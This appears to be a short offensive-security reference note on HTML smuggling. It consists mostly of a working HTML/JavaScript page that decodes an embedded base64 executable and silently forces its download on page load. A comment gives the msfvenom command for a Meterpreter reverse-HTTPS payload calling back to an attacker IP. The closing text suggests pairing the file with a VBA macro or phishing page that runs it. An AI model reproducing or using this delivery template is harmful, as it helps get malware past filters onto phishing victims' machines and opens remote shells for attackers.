Backlink: reference-notes-readme

HTML Smuggling

<html>
    <body>
        <script>
          function base64ToArrayBuffer(base64) {
                  var binary_string = window.atob(base64);
                  var len = binary_string.length;
                  var bytes = new Uint8Array( len );
                  for (var i = 0; i < len; i++) { bytes[i] = binary_string.charCodeAt(i); }
                  return bytes.buffer;
                }
                // msfvenom -p windows/x64/meterpreter/reverse_https lhost=192.168.119.120 lport=443 -f exe -o msfstaged.exe; base64 -w0 msfstaged.exe
                var file = 'TVqQAAMAAAAEAAAA//8AALgAAAAA...
                var data = base64ToArrayBuffer(file);
                var blob = new Blob([data], {type: 'octet/stream'});
                var fileName = 'msfstaged.exe';

                var a = document.createElement('a');
                document.body.appendChild(a);
                a.style = 'display: none';

                // Supported by Chrome/FireFox and Chromium Edge.
                var url = window.URL.createObjectURL(blob);
                a.href = url;
                a.download = fileName;
                a.click();
                window.URL.revokeObjectURL(url);

                // Supported by IE and pre-Chromium Edge
                //window.navigator.msSaveBlob(blob, fileName); // The user only has single 'Save' button
                //window.navigator.msSaveOrOpenBlob(blob, fileName); // User can save or open
        </script>
    </body>
</html>

The user will still have to manually run the file after it's downloaded. This could work well when used with an VBA macro or some other phish served from the same page, that then executes this downloaded file instead of containing the malicious payload itself, or calling out over the network.